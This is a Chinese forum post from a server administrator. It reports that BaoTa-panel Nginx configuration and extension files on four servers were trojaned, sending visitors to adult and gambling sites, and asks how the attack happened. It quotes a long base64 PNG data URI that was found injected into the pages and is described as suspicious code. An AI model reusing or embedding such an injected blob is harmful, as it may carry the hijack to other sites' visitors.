宝塔面板Nginx配置文件和扩展文件分别被挂木马
今天发现四台服务器的所有站点都被劫持了分别跳到X站和菠C站。查看网站源代码发现这段可疑js:data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAjAAAAAmCAIAAABVgzaXAAAJ4klEQVR4AezaQXIkSREF0FHfYIwD9QbjKFyBJcaSK3AUdr3mLNhwg+ZNf3ALi8hMVZWypFK1y775fP/+wyPSq5TRwvjyn/7pCfQEegI9gZ7AA0zgyy/90xPoCfQEegI9gQeYQF9ID/Ah9BHuNIFu2xPoCXyqCfSF9Kk+rj5sT6An0BN43gn0hfS8n20/WU+gJ/C8E3jKJ+sL6Sk/1n6onkBPoCfw+SbQF9Ln+8z6xD2BnkBP4Ckn0BfSU36s1z9Ur+gJ9AR6Ah89gb6QPvoT6P17Aj2BnkBP4McE+kL6MYYOPYGewPNOoJ/ss0ygL6TP8kn1OXsCPYGewJNPoC+kJ/+A+/F6Aj2BnsBnmUBfSNd/Ur2iJ9AT6An0BO4wgb6Q7jDUbtkT6An0BHoC10/gy7/6pyfQE+gJ/H8C/d+ewAdO4Msf+6cn0BPoCfQEegIPMIH+n+yu/6uyV/QEegI9gZ7AHSZw5wvpDifulj2BnkBPoCfwlBPoC+kpP9Z+qJ5AT6An8Pkm0BfS5/vM7nHiv//hb9omIg+Fl5ff1vNsiqvtrsrjN7/HlO7R842T/NgjfezubxzdvZfnlZJ4yV67F1JaiHBJoz2P5cFooIzpymMQYa3eoOgDWVgk6RpfNaxLDpRzux1sdGLJ7xic2PDmVo7x/fuv0/JNcfIk5YTw94m2g2kvCkzivVM71ujwYN2UXiIOla5EtXpWlVj8/YndxyNJg+OTxFPx2KzKKa6gj7vHQAx55Pj2Q97W4fh9uH0hWfOXf//VNBORFTyruCo6wKRTDpYrMViSiLwdYyvcFns9lRj2qjfoF3az7w3NT1lia4dMTMP1dyy6uPkt3BSZPxwHD3Kns23uuCkeHOD0eToAbO446iPfNG+Kt63abPVG0dwcJsCPu8UmHttUX23FM+KSnqP/Q/hrh3z9UK92yCslsdrlVVPpRDYupGn9tOCsdO9YP8PuZ83wrD4+C60SkceBF8H6pd8UH+fMD3KSe0zpHj3fOK7pSOu3Za9/OacOm/4yT9VL1k5Lfqo0r5TE8cEp3vOjEk788u3btySJJO7wMdIhCgK4CAggIyivwkaWjDYpcVTC6RCeKA2SJkYRkyZKg6QVbUSvFJESkRHEQumlIBERwEVAAAnwIGnFUcSjI8f4x59eCnEmxYvgkDRRmv5jJB7DrxzEgwAuAgIIjKQ4PaAUoiSOYvEbSLol1vKkYhQEcBGQAzCMiHNUcKIYTFwKVcILm2JVkTIUIQZRxCmlQMSrolXBtCqiOOlryhOMpSiJ9CITr5QBD3DARSiycqUHhHMG49miJNKLTLxSBjzAARehyMqVJvCMqGqJkyJNCTlGbOJokxZGfZN703oRjSUp8cvXr1/rToo0msKjcyMUBEYSPsY4KcfQp5yIdPVHV0JSRaQBfqEY2xh1mJaPVVyVJ5AGmyKPapVwIAJSSCoG/ErhI8H34Hb58z+/B+WR4lXCodJUKdlojMQD+Hr5tyEgbAiMZORKQIEQMXh5+Y0I+kQRpYUpjR5zeMVVjKIDTDYKRAwpMxJ9L/KDaiICOIQcRCX9OQGRBjgFkChrVAW6CEhgiTTAiXgiAhEpgFOQY/DA6iEG+lQVJ1YaQoHwxNiIEKWIdOSjE1eFGKQIlLJypdiQCXTIkql0Yrq5hU1h3CU2IkQvIh356MRVIQYpAqWsXGnC5NEkBjqEJyZlQACJvhd5YKxaQglG/YB7EeUFyINIkd//QnInYUBSQCbQJ+Ws1HbVHJGunemryBlUKbZJrOomYc4qVUSKjIgYHR9L4ZM4pfGcG90ubhrQFhcLU1o6kpIHmaB0AF+vg+oNJQ19ccFaXDwXr/Z81ZDzxOacIcciG4O4mukjRsOo/7Tc0IJpAtOgpGw8Io4cgweYj22qPJzIg8B5guk80yGlbDwijpyCt7Sy1mHASXDxVXgX1QsTkVry+19I/lOoQin3I05gu7G/lDgqe5yzUB5rI5ZyQGIeDdYSRwUnwqorfRTcLpA76aozeJAJVy0/xezLCvnintKwm3zeCfgmFD7vU/zyy2lnr2kgpzV9r0bODBf+anujeheNR5MSN/5PDSmM1mOuy7Fhs2qVjdYSUWnV95QyI9bu2SZ9z6yDUpmLT/pqKOXtpDbdbFX30FV3Uq3a7HmbuPnN2xSrf1Vf/eJy8tTCkE0xpUSGkMujJbD6iTkAUlV8FSmll/NCYiEcmI+rmwstcaTN0s3iWT312TzDnl5mT8QjljKl0YkhYyTCqOxxNtirjjrbeJixdBXXZ9O/p5fZ7jxiKVKo9BSiIVzSqmyOVHxvoVecN+paJW5cSHwK1iB7USkeBkSKiCOiiEAXAQEkq/AVSgz0vRiDKuCcgEgDKSJuikp01U0oMVQJD+gRkSgiHhFHREACHHARkAAPajkdX0X6CrdL4E5KVYqIgASq0gCPeGHMV2qNlucLp4RIA5wCSBRRGlwi8t8GzbOLiKcJIg0oI0laEVnBTxQBCcJFiLIZU53ilFoYBdlEnR+JAbEkwCOKUcRRpE9gAKIICCAwEhyIwXFPzhWWZK1Y1RIRYko4EuB0kCaG4FdBHwsD/Kq1B2YNVRORq+AYFga1sESEqCriSIBTQJoYgl+OdUkUEfQRIWQzEi+HVkEdfnOtt5x33WaJuH0hKWSNGEQpLoUxLY6MJekIJaCIB4hBDDhDRByQAC9EqRi90hAiIh6gDEhh9K9iKUg58RGrXkpIzOF70dVSKE8pSImINMCvgq9UYFWIiAc4hFekQKWINMCDpIlREikhib7Wk0LfFOnAHOCFKGtkKLE4MqIMISmFV4y4xtFQvAj/yokrYhv1KOKBuDclq0akw6jgqxhlr2eqa9QqGEulFFENF/EAL0TZjAdHWpdH2eyjNOpSGJVwYpD0YPcYppi14qhLgSICAkiAB0kTo+zF1VMKYpUIRfBgVDY58VWkVeKx2VvuwLB7IR2s6dLNE/CvA2sTkYeFX7mb4aGsHaP0KmTttGRTnDwflfo9fOetM40x5gBRws+Kmz1HcXp8JbB7InIKxl3O7Xzt8TZ3H8XxqJorQYh4FqZdzmp73CcPEs/xAThvQF9INwzt9iX+dRDc3uJdVvqq3QwHrLUjL/H5yPs/5rjjyN9ttuOmI3cAKSBb+PVm8R49bz7MunA83sg5pYCci3v0fPWE46YjXxeq3oC+kG4YWi/pCfQEegI9gfMn0BfS+TPtjj2BnkBPoCdwwwR2L6SXl5e0e3n5H0l6SXz58XOJ842eXt4T6An0BHoCTzOB7QvJhfL9+/c8JCINvzxadbm5nT2BnkBPoCfQE9i+kHouPYGewEdPoPfvCfx0E9i4kPw9NP19IyX+dLPpB+4J9AR6Aj2Bd5zAfwEAAP//g4omIAAAAAZJREFUAwD9FpcuOBNrxAAAAABJRU5ErkJggg==然后在nginx配置文件和扩展文件分别找到一段加密木马。服务器分别用的nginx版本是1.2.4.0和1.21.4有没有大佬知道这黑客是怎么入侵的?
如需安全运维服务,可联系我司安全运维客户经理
页:
[1]